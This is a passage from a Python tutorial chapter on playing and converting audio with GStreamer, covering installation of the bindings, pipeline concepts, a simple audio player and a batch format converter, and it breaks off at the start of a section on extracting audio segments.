Next, install the Python bindings for GStreamer. The binary distribution is available on the same website. Use the executable Pygst-0.10.15.1-Python2.6.exe pertaining to Python 2.6. The version should be 0.10.15 or higher.

GStreamer WinBuilds appears to be an independent project. It is based on the OSSBuild developing suite. Visit for more information.

It could happen that the GStreamer binary built with Python 2.6 is no longer available on the mentioned website at the time you are reading this book. Therefore, it is advised that you should contact the developer community of OSSBuild. Perhaps they might help you out!

Alternatively, you can build GStreamer from source on the Windows platform, using a Linux-like environment for Windows, such as Cygwin. Under this environment, you can first install dependent software packages such as Python 2.6, the gcc compiler, and others. Download the gst-python-0.10.17.2.tar.gz package from the GStreamer website. Then extract this package and install it from sources using the Cygwin environment. The INSTALL file within this package will have installation instructions.
If you are using packages using this default version of Python, GStreamer Python bindings using Python 2.5 are available on the darwinports website: PyGobject There is a free multiplatform software utility library called 'GLib'. It provides data structures such as hash maps, linked lists, and so on. It also supports the creation of threads. The 'object system' of GLib is called GObject. Here, we need to install the Python bindings for GObject. The Python bindings are available on the PyGTK website at:. Windows platform The binary installer is available on the PyGTK website. The complete URL is:?. Download and install version 2.20 for Python 2.6. Other platforms For Linux, the source tarball is available on the PyGTK website. There could even be binary distribution in the package repository of your Linux operating system. The direct link to the Version 2.21 of PyGObject (source tarball) is: If you are a Mac user and you have Python 2.6 installed, a distribution of PyGObject is available at. Install version 2.14 or later. Summary of installation prerequisites The following table summarizes the packages needed for this article. Testing the installation Ensure that the GStreamer and its Python bindings are properly installed. It is simple to test this. Just start Python from the command line and type the following: >>>import pygst If there is no error, it means the Python bindings are installed properly. Next, type the following: >>>pygst.require("0.10") >>>import gst If this import is successful, we are all set to use GStreamer for processing audios and videos! If import gst fails, it will probably complain that it is unable to work some required DLL/shared object. In this case, check your environment variables and make sure that the PATH variable has the correct path to the gstreamer/bin directory. The following lines of code in a Python interpreter show the typical location of the pygst and gst modules on the Windows platform. >>> import pygst >>> pygst <module 'pygst' from 'C:\Python26\lib\site-packages\pygst.pyc'> >>> pygst.require('0.10') >>> import gst >>> gst <module 'gst' from 'C:\Python26\lib\site-packages\gst-0.10\gst\__init__.pyc'> Next, test if PyGObject is successfully installed. Start the Python interpreter and try importing the gobject module. >>import gobject If this works, we are all set to proceed! A primer on GStreamer In this article,. For further reading, you are recommended to visit the GStreamer project website: gst-inspect and gst-launch We will start by learning the two important GStreamer commands. GStreamer can be run from the command line, by calling gst-launch-0.10.exe (on Windows) or gst-launch-0.10(on other platforms). The following command shows a typical execution of GStreamer on Linux. We will see what a pipeline means in the next sub-section. $gst-launch-0.10 pipeline_description GStreamer has a plugin architecture. It supports a huge number of plugins. To see more details about any plugin in your GStreamer installation, use the command gst-inspect-0.10 (gst-inspect-0.10.exe on Windows). We will use this command quite often. Use of this command is illustrated here. $gst-inspect-0.10 decodebin Here, decodebin is a plugin. Upon execution of the preceding command, it prints detailed information about the plugin decodebin. Elements and pipeline In GStreamer, the data flows in a pipeline. Various elements are connected together forming a pipeline, such that the output of the previous element is the input to the next one. 
A pipeline can be logically represented as follows: Element1 ! Element2 ! Element3 ! Element4 ! Element5 Here, Element1 through to Element5 are the element objects chained together by the symbol !. Each of the elements performs a specific task. One of the element objects performs the task of reading input data such as an audio or a video. Another element decodes the file read by the first element, whereas another element performs the job of converting this data into some other format and saving the output. As stated earlier, linking these element objects in a proper manner creates a pipeline. The concept of a pipeline is similar to the one used in Unix. Following is a Unix example of a pipeline. Here, the vertical separator | defines the pipe. $ls -la | more Here, the ls -la lists all the files in a directory. However, sometimes, this list is too long to be displayed in the shell window. So, adding | more allows a user to navigate the data. Now let's see a realistic example of running GStreamer from the command prompt. $ gst-launch-0.10 -v filesrc location=path/to/file.ogg ! decodebin ! audioconvert ! fakesink For a Windows user, the gst command name would be gst-launch-0.10.exe. The pipeline is constructed by specifying different elements. The !symbol links the adjacent elements, thereby forming the whole pipeline for the data to flow. For Python bindings of GStreamer, the abstract base class for pipeline elements is gst.Element, whereas gst.Pipeline class can be used to created pipeline instance. In a pipeline, the data is sent to a separate thread where it is processed until it reaches the end or a termination signal is sent. Plugins GStreamer is a plugin-based framework. There are several plugins available. A plugin is used to encapsulate the functionality of one or more GStreamer elements. Thus we can have a plugin where multiple elements work together to create the desired output. The plugin itself can then be used as an abstract element in the GStreamer pipeline. An example is decodebin. We will learn about it in the upcoming sections. A comprehensive list of available plugins is available at the GStreamer website. In almost all applications to be developed, decodebin plugin will be used. For audio processing, the functionality provided by plugins such as gnonlin, audioecho, monoscope, interleave, and so on will be used. Bins In GStreamer, a bin is a container that manages the element objects added to it. A bin instance can be created using gst.Bin class. It is inherited from gst.Element and can act as an abstract element representing a bunch of elements within it. A GStreamer plugin decodebin is a good example representing a bin. The decodebin contains decoder elements. It auto-plugs the decoder to create the decoding pipeline. Pads Each element has some sort of connection points to handle data input and output. GStreamer refers to them as pads. Thus an element object can have one or more "receiver pads" termed as sink pads that accept data from the previous element in the pipeline. Similarly, there are 'source pads' that take the data out of the element as an input to the next element (if any) in the pipeline. The following is a very simple example that shows how source and sink pads are specified. >gst-launch-0.10.exe fakesrc num-bufferes=1 ! fakesink The fakesrc is the first element in the pipeline. Therefore, it only has a source pad. It transmits the data to the next linkedelement, that is fakesink which only has a sink pad to accept elements. 
Note that, in this case, since these are fakesrc and fakesink, just empty buffers are exchanged. A pad is defined by the class gst.Pad. A pad can be attached to an element object using the gst.Element.add_pad() method. The following is a diagrammatic representation of a GStreamer element with a pad. It illustrates two GStreamer elements within a pipeline, having a single source and sink pad. Now that we know how the pads operate, let's discuss some of special types of pads. In the example, we assumed that the pads for the element are always 'out there'. However, there are some situations where the element doesn't have the pads available all the time. Such elements request the pads they need at runtime. Such a pad is called a dynamic pad. Another type of pad is called ghost pad. These types are discussed in this section. Dynamic pads Some objects such as decodebin do not have pads defined when they are created. Such elements determine the type of pad to be used at the runtime. For example, depending on the media file input being processed, the decodebin will create a pad. This is often referred to as dynamic pad or sometimes the available pad as it is not always available in elements such as decodebin. Ghost pads As stated in the Bins section a bin object can act as an abstract element. How is it achieved? For that, the bin uses 'ghost pads' or 'pseudo link pads'. The ghost pads of a bin are used to connect an appropriate element inside it. A ghost pad can be created using gst.GhostPad class. Caps The element objects send and receive the data by using the pads. The type of media data that the element objects will handle is determined by the caps (a short form for capabilities). It is a structure that describes the media formats supported by the element. The caps are defined by the class gst.Caps. Bus A bus refers to the object that delivers the message generated by GStreamer. A message is a gst.Message object that informs the application about an event within the pipeline. A message is put on the bus using the gst.Bus.gst_bus_post() method. The following code shows an example usage of the bus. 1 bus = pipeline.get_bus() 2 bus.add_signal_watch() 3 bus.connect("message", message_handler) The first line in the code creates a gst.Bus instance. Here the pipeline is an instance of gst.PipeLine. On the next line, we add a signal watch so that the bus gives out all the messages posted on that bus. Line 3 connects the signal with a Python method. In this example, the message is the signal string and the method it calls is message_handler. Playbin/Playbin2 Playbin is a GStreamer plugin that provides a high-level audio/video player. It can handle a number of things such as automatic detection of the input media file format, auto-determination of decoders, audio visualization and volume control, and so on. The following line of code creates a playbin element. playbin = gst.element_factory_make("playbin") It defines a property called uri. The URI (Uniform Resource Identifier) should be an absolute path to a file on your computer or on the Web. According to the GStreamer documentation, Playbin2 is just the latest unstable version but once stable, it will replace the Playbin. A Playbin2 instance can be created the same way as a Playbin instance. gst-inspect-0.10 playbin2 With this basic understanding, let us learn about various audio processing techniques using GStreamer and Python. (For more resources on Python, see here.) 
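As a quick preview before the detailed walkthrough, here is a minimal, hedged sketch of playing a file with playbin on its own. The file path is illustrative, and the fuller treatment of threads and bus messages follows in the next sections:

import gobject
import pygst
pygst.require("0.10")
import gst

gobject.threads_init()

player = gst.element_factory_make("playbin")
# uri must be an absolute URI; this local path is only an example.
player.set_property("uri", "file:///path/to/my_music.mp3")
player.set_state(gst.STATE_PLAYING)

# Keep the process alive until the end of the stream is reached.
loop = gobject.MainLoop()
bus = player.get_bus()
bus.add_signal_watch()
bus.connect("message::eos", lambda bus, message: loop.quit())
loop.run()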
Playing music Given an audio file, one the first things you will do is to play that audio file, isn't it? In GStreamer, what basic elements do we need to play an audio? The essential elements are listed as follows. - The first thing we need is to open an audio file for reading - Next, we need a decoder to transform the encoded information - Then, there needs to be an element to convert the audio format so that it is in a 'playable' format required by an audio device such as speakers - Finally, an element that will enable the actual playback of the audio file How will you play an audio file using the command-line version of GStreamer? One way to execute it using command line is as follows: $gstlaunch-0.10 filesrc location=/path/to/audio.mp3 ! decodebin ! audioconvert ! autoaudiosink The autoaudiosink automatically detects the correct audio device on your computer to play the audio. This was tested on a machine with Windows XP and it worked fine. If there is any error playing an audio, check if the audio device on your computer is working properly. You can also try using element sdlaudiosink that outputs to the sound card via SDLAUDIO. If this doesn't work, and you want to install a plugin for audiosink—here is a partial list of GStreamer plugins: Mac OS X users can try installing osxaudiosink if the default autoaudiosink doesn't work. The audio file should start playing with this command unless there are any missing plugins. Time for action – playing an audio: method 1 There are a number of ways to play an audio using Python and GStreamer. Let's start with a simple one. In this section, we will use a command string, similar to what you would specify using the command-line version of GStreamer. This string will be used to construct a gst.Pipeline instance in a Python program. So, here we go! - Start by creating an AudioPlayer class in a Python source file. Just define the empty methods illustrated in the following code snippet. We will expand those in the later steps. 1 import thread 2 import gobject 3 import pygst 4 pygst.require("0.10") 5 import gst 6 7 class AudioPlayer: 8 def __init__(self): 9 pass 10 def constructPipeline(self): 11 pass 12 def connectSignals(self): 13 pass 14 def play(self): 15 pass 16 def message_handler(self): 17 pass 18 19 # Now run the program 20 player = AudioPlayer() 21 thread.start_new_thread(player.play, ()) 22 gobject.threads_init() 23 evt_loop = gobject.MainLoop() 24 evt_loop.run() Lines 1 to 5 in the code import the necessary modules. As discussed in the Installation prerequisites section, the package pygst is imported first. Then we call pygst.require to enable the import of gst module. - Now focus on the code block between lines 19 to 24. It is the main execution code. It enables running the program until the music is played. We will use this or similar code throughout to run our audio application. On line 21, the thread module is used to create a new thread for playing the audio. The method AudioPlayer.play is sent on this thread. The second argument of thread.start_new_thread is the list of arguments to be passed to the method play. In this example, we do not support any command-line arguments. Therefore, an empty tuple is passed. Python adds its own thread management functionality on top of the operating system threads. When such a thread makes calls to external functions (such as C functions), it puts the 'Global Interpreter Lock' on other threads until, for instance, the C function returns a value. 
The gobject.threads_init() is an initialization function for facilitating the use of Python threading within the gobject modules. It can enable or disable threading while calling the C functions. We call this before running the main event loop. The main event loop for executing this program is created using gobject on line 23 and this loop is started by the call evt_loop.run(). - Next, fill the AudioPlayer class methods with the code. First, write the constructor of the class. 1 def __init__(self): 2 self.constructPipeline() 3 self.is_playing = False 4 self.connectSignals() The pipeline is constructed by the method call on line 2. The flag self.is_playing is initialized to False. It will be used to determine whether the audio being played has reached the end of the stream. On line 4, a method self.connectSignals is called, to capture the messages posted on a bus. We will discuss both these methods next. - The main driver for playing the sound is the following gst command: "filesrc location=C:/AudioFiles/my_music.mp3 "\ "! decodebin ! audioconvert ! autoaudiosink" The preceding string has four elements separated by the symbol !. These elements represent the components we briefly discussed earlier. - The first element filesrc location=C:/AudioFiles/my_music.mp3 defines the source element that loads the audio file from a given location. In this string, just replace the audio file path represented by location with an appropriate file path on your computer. You can also specify a file on a disk drive. If the filename contains namespaces, make sure you specify the path within quotes. For example, if the filename is my sound.mp3, specify it as follows: filesrc location =\"C:/AudioFiles/my sound.mp3\" - The next element loads the file. This element is connected to a decodebin. As discussed earlier, the decodebin is a plugin to GStreamer and it inherits gst.Bin. Based on the input audio format, it determines the right type of decoder element to use. The third element is audioconvert. It translates the decoded audio data into a format playable by the audio device. The final element, autoaudiosink, is a plugin; it automatically detects the audio sink for the audio output. We have sufficient information now to create an instance of gst.Pipeline. Write the following method. 1 def constructPipeline(self): 2 myPipelineString = \ 3 "filesrc location=C:/AudioFiles/my_music.mp3 "\ 4 "! decodebin ! audioconvert ! autoaudiosink" 5 self.player = gst.parse_launch(myPipelineString) An instance of gst.Pipeline is created on line 5, using the gst.parse_launch method. - Now write the following method of class AudioPlayer. 1 def connectSignals(self): 2 # In this case, we only capture the messages 3 # put on the bus. 4 bus = self.player.get_bus() 5 bus.add_signal_watch() 6 bus.connect("message", self.message_handler) On line 4, an instance of gst.Bus is created. In the introductory section on GStreamer, we already learned what the code between lines 4 to 6 does. This bus has the job of delivering the messages posted on it from the streaming threads. The add_signal_watch call makes the bus emit the message signal for each message posted. This signal is used by the method message_handler to take appropriate action. Write the following method: 1 def play(self): 2 self.is_playing = True 3 self.player.set_state(gst.STATE_PLAYING) 4 while self.is_playing: 5 time.sleep(1) 6 evt_loop.quit() On line 2, we set the state of the gst pipeline to gst.STATE_PLAYING to start the audio streaming. 
The flag self.is_playing controls the while loop on line 4. This loop ensures that the main event loop is not terminated before the end of the audio stream is reached. Within the loop the call to time.sleep just buys some time for the audio streaming to finish. The value of flag is changed in the method message_handler that watches for the messages from the bus. On line 6, the main event loop is terminated. This gets called when the end of stream message is emitted or when some error occurs while playing the audio. - Next, develop method AudioPlayer.message_handler. This method sets the appropriate flag to terminate the main loop and is also responsible for changing the playing state of the pipeline. 1 def message_handler(self, bus, message): 2 # Capture the messages on the bus and 3 # set the appropriate flag. 4 msgType = message.type 5 if msgType == gst.MESSAGE_ERROR: 6 self.player.set_state(gst.STATE_NULL) 7 self.is_playing = False 8 print "\n Unable to play audio. Error: ", \ 9 message.parse_error() 10 elif msgType == gst.MESSAGE_EOS: 11 self.player.set_state(gst.STATE_NULL) 12 self.is_playing = False In this method, we only check two things: whether the message on the bus says the streaming audio has reached its end (gst.MESSAGE_EOS) or if any error occurred while playing the audio stream (gst.MESSAGE_ERROR). For both these messages, the state of the gst pipeline is changed from gst.STATE_PLAYING to gst.STATE_NULL. The self.is_playing flag is updated to instruct the program to terminate the main event loop. We have defined all the necessary code to play the audio. Save the file as PlayingAudio.py and run the application from the command line as follows: $python PlayingAudio.py This will begin playback of the input audio file. Once it is done playing, the program will be terminated. You can press Ctrl + C on Windows or Linux to interrupt the playing of the audio file. It will terminate the program. What just happened? We developed a very simple audio player, which can play an input audio file. The code we wrote covered some of the most important components of GStreamer. These components will be useful throughout this article. The core component of the program was a GStreamer pipeline that had instructions to play the given audio file. Additionally, we learned how to create a thread and then start a gobject event loop to ensure that the audio file is played until the end. Have a go hero – play audios from a playlist The simple audio player we developed can only play a single audio file, whose path is hardcoded in the constructed GStreamer pipeline. Modify this program so it can play audios in a playlist. In this case, play list should define full paths of the audio files you would like to play, one after the other. For example, you can specify the file paths as arguments to this application or load the paths defined in a text file or load all audio files from a directory. Building a pipeline from elements In the last section, a gst.Pipeline was automatically constructed for us by the gst.parse_launch method. All it required was an appropriate command string, similar to the one specified while running the command-line version of GStreamer. The creation and linking of elements was handled internally by this method. In this section, we will see how to construct a pipeline by adding and linking individual element objects. 'GStreamer Pipeline' construction is a fundamental technique that we will use throughout this article. 
Time for action – playing an audio: method 2 We have already developed code for playing an audio. Let's now tweak the method AudioPlayer.constructPipeline to build the gst.Pipeline using different element objects. - Rewrite the constructPipeline method as follows. You can also download the file PlayingAudio.py from the Packt website for reference. 1 def constructPipeline(self): 2 self.player = gst.Pipeline() 3 self.filesrc = gst.element_factory_make("filesrc") 4 self.filesrc.set_property("location", 5 "C:/AudioFiles/my_music.mp3") 6 7 self.decodebin = gst.element_factory_make("decodebin", 8 "decodebin") 9 # Connect decodebin signal with a method. 10 # You can move this call to self.connectSignals) 11 self.decodebin.connect("pad_added", 12 self.decodebin_pad_added) 13 14 self.audioconvert = \ 15 gst.element_factory_make("audioconvert", 16 "audioconvert") 17 18 self.audiosink = \ 19 gst.element_factory_make("autoaudiosink", 20 "a_a_sink") 21 22 # Construct the pipeline 23 self.player.add(self.filesrc, self.decodebin, 24 self.audioconvert, self.audiosink) 25 # Link elements in the pipeline. 26 gst.element_link_many(self.filesrc, self.decodebin) 27 gst.element_link_many(self.audioconvert,self.audiosink) - We begin by creating an instance of class gst.Pipeline. - Next, on line 2, we create the element for loading the audio file. Any new gst element can be created using the API method, gst.element_factory_make. The method takes the element name (string) as an argument. For example, on line 3, this argument is specified as "filesrc" in order to create an instance of element GstFileSrc. Each element will have a set of properties. The path of the input audio file is stored in a property location of self.filesrc element. This property is set on line 4. Replace the file path string with an appropriate audio file path. You can get a list of all properties by running the 'gst-inspect-0.10 ' command from a console window. See the introductory section on GSreamer for more details. - The second optional argument serves as a custom name for the created object. For example, on line 20, the name for the autoaudiosink object is specified as a_a_sink. Like this, we create all the essential elements necessary to build the pipeline. - On line 23 in the code, all the elements are put in the pipeline by calling the gst.Pipeline.add method. - The method gst.element_link_many establishes connection between two or more elements for the audio data to flow between them. The elements are linked together by the code on lines 26 and 27. However, notice that we haven't linked together the elements self.decodebin and self.audioconvert. Why? That's up next. - We cannot link the decodebin element with the audioconvert element at the time the pipeline is created. This is because decodebin uses dynamic pads. These pads are not available for connection with the audioconvert element when the pipeline is created. Depending upon the input data , it will create a pad. Thus, we need to watch out for a signal that is emitted when the decodebin adds a pad! How do we do that? It is done by the code on line 11 in the code snippet above. The "pad-added" signal is connected with a method, decodebin_pad_added. Whenever decodebin adds a dynamic pad, this method will get called. - Thus, all we need to do is to manually establish a connection between decodebin and audioconvert elements in the method decodebin_pad_added. Write the following method. 
1 def decodebin_pad_added(self, decodebin, pad ): 2 caps = pad.get_caps() 3 compatible_pad = \ 4 self.audioconvert.get_compatible_pad(pad, caps) 5 6 pad.link(compatible_pad) The method takes the element (in this case it is self.decodebin ) and pad as arguments. The pad is the new pad for the decodebin element. We need to link this pad with the appropriate one on self.audioconvert. - On line 2 in this code snippet, we find out what type of media data the pad handles. Once the capabilities (caps) are known, we pass this information to the method get_compatible_pad of object self.audioconvert. This method returns a compatible pad which is then linked with pad on line 6. - The rest of the code is identical with the one illustrated in the earlier section. You can run this program the same way described earlier. What just happened? We learned some very crucial components of GStreamer framework. With the simple audio player as an example, we created a GStreamer pipeline 'from scratch' by creating various element objects and linking them together. We also learned how to connect two elements by 'manually' linking their pads and why that was required for the element self.decodebin. Playing an audio from a website If there is an audio somewhere on a website that you would like to play, we can pretty much use the same AudioPlayer class developed earlier. In this section, we will illustrate the use of gst.Playbin2 to play an audio by specifying a URL. The code snippet below shows the revised AudioPlayer.constructPipeline method. The name of this method should be changed as it is playbin object that it creates. 1 def constructPipeline(self): 2 file_url = "" 3 buf_size = 1024000 4 self.player = gst.element_factory_make("playbin2") 5 self.player.set_property("uri", file_url) 6 self.player.set_property("buffer-size", buf_size) 7 self.is_playing = False 8 self.connectSignals() On line 4, the gst.Playbin2 element is created using gst.element_factory_make method. The argument to this method is a string that describes the element to be created. In this case it is playbi . You can also define a custom name for this object by supplying an optional second argument to this method. Next, on line 5 and 6, we assign values to the properties uri and buffer-size. Set the uri property to an appropriate URL , the full path to the audio file you would like to play. Note: When you execute this program, Python application tries to access the Internet. The anti-virus installed on your computer may block the program execution. In this case, you will need to allow this program to access the Internet. Also, you need to be careful of hackers. If you get the fil_url from an untrusted source, perform a safety check such as assert not re.match("file://", file_url). Have a go hero – use 'playbin' to play local audios In the last few sections, we learned different ways to play an audio file using Python and GStreamer. In the previous section, you must have noticed another simple way to achieve this, using a playbin or playbin2 object to play an audio. In the previous section, we learned how to play an audio file from a URL. Modify this code so that this program can now play audio files located in a drive on your computer. Hint: You will need to use the correct uri path. Convert the file path using Python's module urllib.pathname2url and then append it to the string: "file://". Converting audio file format Suppose you have a big collection of songs in wav file format that you would like to load on a cell phone. 
But you find out that the cell phone memory card doesn't have enough space to hold all these. What will you do? You will probably try to reduce the size of the song files, right? Converting the files into mp3 format will reduce the size. Of course, you can do it using some media player. Let's learn how to perform this conversion operation using Python and GStreamer. Later we will develop a simple command-line utility that can be used to perform a batch conversion for all the files you need.

- Like in the earlier examples, let's first list the important building blocks we need to accomplish file conversion. The first three elements remain the same.
- As before, the first thing we need is to load an audio file for reading.
- Next, we need a decoder to transform the encoded information.
- Then, there needs to be an element to convert the raw audio buffers into an appropriate format.
- An encoder is needed that takes the raw audio data and encodes it to an appropriate file format to be written.
- An element where the encoded data will be streamed to is needed. In this case it is our output audio file.

Okay, what's next? Before jumping into the code, first check if you can achieve what you want using the command-line version of GStreamer.

$gst-launch-0.10.exe filesrc location=/path/to/input.wav ! decodebin ! audioconvert ! lame ! filesink location=/path/to/output.mp3

Specify the correct input and output file paths and run this command to convert a wave file to an mp3. If it works, we are all set to proceed. Otherwise check for missing plugins. You should refer to the GStreamer API documentation to know more about the properties of the various elements illustrated above. Trust me, the gst-inspect-0.10 (or gst-inspect-0.10.exe for Windows users) command is a very handy tool that will help you understand the components of a GStreamer plugin. The instructions on running this tool are already discussed earlier in this article.

Time for action – audio file format converter
Let's write a simple audio file converter. This utility will batch process input audio files and save them in a user-specified file format. To get started, download the file AudioConverter.py from the Packt website. This file can be run from the command line as:

python AudioConverter.py [options]

where the [options] are as follows:

- --input_dir: The directory from which to read the input audio file(s) to be converted.
- --input_format: The audio format of the input files. The format should be in a supported list of formats. The supported formats are "mp3", "ogg", and "wav". If no format is specified, it will use ".wav" as the default.
- --output_dir: The output directory where the converted files will be saved. If no output directory is specified, it will create a folder OUTPUT_AUDIOS within the input directory.
- --output_format: The audio format of the output file. Supported output formats are "wav" and "mp3".

Let's write this code now.

- Start by importing necessary modules.

import os, sys, time
import thread
import getopt, glob
import gobject
import pygst
pygst.require("0.10")
import gst

- Now declare the following class and the utility function. As you will notice, several of the methods have the same names as before. The underlying functionality of these methods will be similar to what we already discussed. In this section we will review only the most important methods in this class. You can refer to file AudioConverter.py for other methods or develop those on your own.
def audioFileExists(fil):
    return os.path.isfile(fil)

class AudioConverter:
    def __init__(self):
        pass
    def constructPipeline(self):
        pass
    def connectSignals(self):
        pass
    def decodebin_pad_added(self, decodebin, pad):
        pass
    def processArgs(self):
        pass
    def convert(self):
        pass
    def convert_single_audio(self, inPath, outPath):
        pass
    def message_handler(self, bus, message):
        pass
    def printUsage(self):
        pass
    def printFinalStatus(self, inputFileList, starttime, endtime):
        pass

# Run the converter
converter = AudioConverter()
thread.start_new_thread(converter.convert, ())
gobject.threads_init()
evt_loop = gobject.MainLoop()
evt_loop.run()

- Look at the last few lines of code above. This is exactly the same code we used in the Playing Music section. The only difference is the name of the class and the method that is put on the thread in the call thread.start_new_thread. At the beginning, the function audioFileExists() is declared. It will be used to check if the specified path is a valid file path.

- Now write the constructor of the class. Here we do the initialization of various variables.

def __init__(self):
    # Initialize various attrs
    self.inputDir = os.getcwd()
    self.inputFormat = "wav"
    self.outputDir = ""
    self.outputFormat = ""
    self.error_message = ""
    self.encoders = {"mp3":"lame", "wav": "wavenc"}
    self.supportedOutputFormats = self.encoders.keys()
    self.supportedInputFormats = ("ogg", "mp3", "wav")
    self.pipeline = None
    self.is_playing = False
    self.processArgs()
    self.constructPipeline()
    self.connectSignals()

- The self.supportedOutputFormats is obtained from the keys of self.encoders and stores the supported output formats. The self.supportedInputFormats is a tuple that stores the supported input formats. These objects are used in self.processArgs to do the necessary checks. The dictionary self.encoders provides the correct type of encoder string to be used to create an encoder element object for the GStreamer pipeline. As the name suggests, the call to self.constructPipeline() builds a gst.Pipeline instance, and various signals are connected using self.connectSignals().

- Next, prepare a GStreamer pipeline.

def constructPipeline(self):
    self.pipeline = gst.Pipeline("pipeline")
    self.filesrc = gst.element_factory_make("filesrc")
    self.decodebin = gst.element_factory_make("decodebin")
    self.audioconvert = gst.element_factory_make("audioconvert")
    self.filesink = gst.element_factory_make("filesink")

    encoder_str = self.encoders[self.outputFormat]
    self.encoder = gst.element_factory_make(encoder_str)

    self.pipeline.add(self.filesrc, self.decodebin,
                      self.audioconvert, self.encoder,
                      self.filesink)
    gst.element_link_many(self.filesrc, self.decodebin)
    gst.element_link_many(self.audioconvert, self.encoder,
                          self.filesink)
You can run the gst-inspect-0.10 command to know more about the lame mp3 encoder. The following command can be run from shell on Linux. $gst-inspect-0.10 lame - The elements are added to the pipeline and then linked together. As before, the self.decodebin and self.audioconvert are not linked in this method as the decodebin plugin uses dynamic pads. The pad_added signal from the self.decodebin is connected in the self.connectSignals() method. - Another noticeable change is that we have not set the location property for both, self.filesrc and self.filesink. These properties will be set at the runtime. The input and output file locations keep on changing as the tool is a batch processing utility. - Let's write the main method that controls the conversion process. 1 def convert(self): 2 pattern = "*." + self.inputFormat 3 filetype = os.path.join(self.inputDir, pattern) 4 fileList = glob.glob(filetype) 5 inputFileList = filter(audioFileExists, fileList) 6 7 if not inputFileList: 8 print "\n No audio files with extension %s "\ 9 "located in dir %s"%( 10 self.outputFormat, self.inputDir) 11 return 12 else: 13 # Record time before beginning audio conversion 14 starttime = time.clock() 15 print "\n Converting Audio files.." 16 17 # Save the audio into specified file format. 18 # Do it in a for loop If the audio by that name already 19 # exists, do not overwrite it 20 for inPath in inputFileList: 21 dir, fil = os.path.split(inPath) 22 fil, ext = os.path.splitext(fil) 23 outPath = os.path.join( 24 self.outputDir, 25 fil + "." + self.outputFormat) 26 27 28 print "\n Input File: %s%s, Conversion STARTED..."\ 29 % (fil, ext) 30 self.convert_single_audio(inPath, outPath) 31 if self.error_message: 32 print "\n Input File: %s%s, ERROR OCCURED" \ 33 % (fil, ext) 34 print self.error_message 35 else: 36 print "\nInput File: %s%s,Conversion COMPLETE"\ 37 % (fil, ext) 38 39 endtime = time.clock() 40 41 self.printFinalStatus(inputFileList, starttime, 42 endtime) 43 evt_loop.quit() - All the input audio files are collected in the list inputFileList by the code between lines 2 to 6. Then, we loop over each of these files. First, the output file path is derived based on user inputs and then the input file path. - The highlighted line of code is the workhorse method, AudioConverter.convert_single_audio, that actually does the job of converting the input audio. We will discuss that method next. On line 43, the main event loop is terminated. The rest of the code in method convert is self-explanatory. - The code in method convert_single_audio is illustrated below. 1 def convert_single_audio(self, inPath, outPath): 2 inPth = repr(inPath) 3 outPth = repr(outPath) 4 5 # Set the location property for file source and sink 6 self.filesrc.set_property("location", inPth[1:-1]) 7 self.filesink.set_property("location", outPth[1:-1]) 8 9 self.is_playing = True 10 self.pipeline.set_state(gst.STATE_PLAYING) 11 while self.is_playing: 12 time.sleep(1) - As mentioned in the last step, convert_single_audio method is called within a for loop in the self.convert(). The for loop iterates over a list containing input audio file paths. The input and output file paths are given as arguments to this method. The code between lines 8-12 looks more or less similar to AudioPlayer.play() method illustrated in the Play audio section. The only difference is the main event loop is not terminated in this method. Earlier we did not set the location property for the file source and sink. These properties are set on lines 6 and 7 respectively. 
- Now what's up with the code on lines 2 and 3? The call repr(inPath) returns a printable representation of the string inPath. The inPathis obtained from the 'for loop'. The os.path.normpath doesn't work on this string. In Windows, if you directly use inPath, GStreamer will throw an error while processing such a path string. One way to handle this is to use repr(string) , which will return the whole string including the quotes . For example: if inPath be "C:/AudioFiles/my_music.mp3" , then repr(inPath) will return in "'C:\\\\AudioFiles\\\\my_music.mp3'". Notice that it has two single quotes. We need to get rid of the extra single quotes at the beginning and end by slicing the string as inPth[1:-1]. There could be some other better ways. You can come up with one and then just use that code as a path string! - Let's quickly skim through a few more methods. Write these down: def connectSignals(self): # Connect the signals. # Catch the messages on the bus bus = self.pipeline.get_bus() bus.add_signal_watch() bus.connect("message", self.message_handler) # Connect the decodebin "pad_added" signal. self.decodebin.connect("pad_added", self.decodebin_pad_added) def decodebin_pad_added(self, decodebin, pad): caps = pad.get_caps() compatible_pad=\ self.audioconvert.get_compatible_pad(pad, caps) pad.link(compatible_pad) - The connectSignal method is identical to the one discussed in the Playing music section, except that we are also connecting the decodebin signal with a method decodebin_pad_added. Add a print statement to decodebin_pad_added to check when it gets called. It will help you understand how the dynamic pad works! The program starts by processing the first audio file. The method convert_single_audio gets called. Here, we set the necessary file paths. After that, it begins playing the audio file. At this time, the pad_addedsignal is generated. Thus based on the input file data, decodebin will create the pad. - The rest of the methods such as processArgs, printUsage, and message_handler are self-explanatory. You can review these methods from the file AudioConverter.py. - The audio converter should be ready for action now! Make sure that all methods are properly defined and then run the code by specifying appropriate input arguments. The following screenshot shows a sample run of audio conversion utility on Windows XP. Here, it will batch process all audio files in directory C:\AudioFiles with extension .ogg and convert them into mp3 file format . The resultant mp3 files will be created in directory C:\AudioFiles\OUTPUT_AUDIOS. What just happened? A basic audio conversion utility was developed in the previous section. This utility can batch-convert audio files with ogg or mp3 or wav format into user-specified output format (where supported formats are wav and mp3). We learned how to specify encoder and filesink elements and link them in the GStreamer pipeline. To accomplish this task, we also applied knowledge gained in earlier sections such as creation of GStreamer pipeline, capturing bus messages, running the main event loop, and so on. Have a go hero – do more with audio converter The audio converter we wrote is fairly simple. It deserves an upgrade. Extend this application to support more audio output formats such as ogg, flac, and so on. The following pipeline illustrated one way of converting an input audio file into ogg file format. filesrc location=input.mp3 ! decodebin ! audioconvert ! vorbisenc ! oggmux ! 
filesink location=output.ogg Notice that we have an audio muxer, oggmux, that needs to be linked with encoder vorbisenc. Similarly, to create an MP4 audio file, it will need {faac ! mp4mux} as encoder and audio muxer. One of the simplest things to do is to define proper elements (such as encoder and muxer) and instead of constructing a pipeline from individual elements, use the gst.parse_launch method we studied earlier and let it automatically create and link elements using the command string. You can create a pipeline instance each time the audio conversion is called for. But in this case you would also need to connect signals each time the pipeline is created. Another better and simpler way is to link the audio muxer in the AudioConverter.constructPipeline method. You just need to check if it is needed based on the type of plugin you are using for encoding. In this case the code will be: gst.element_link_many(self.audioconvert, self.encoder, self.audiomuxer, self.filesink) The audio converter illustrated in this example takes input files of only a single audio file format. This can easily be extended to accept input audio files in all supported file formats (except for the type specified by the --output_format option). The decodebin should take care of decoding the given input data. Extend Audio Converter to support this feature. You will need to modify the code in the AudioConverter.convert() method where the input file list is determined. Extracting part of an audio Suppose you have recorded a live concert of your favorite musician or a singer. You have saved all this into a single file with MP3 format but you would like to break this file into small pieces. There is more than one way to achieve this using Python and GStreamer. We will use the 